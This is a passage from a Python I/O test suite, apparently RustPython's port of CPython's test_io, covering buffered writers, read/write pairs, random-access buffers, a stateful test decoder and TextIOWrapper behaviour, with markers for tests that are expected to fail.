bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
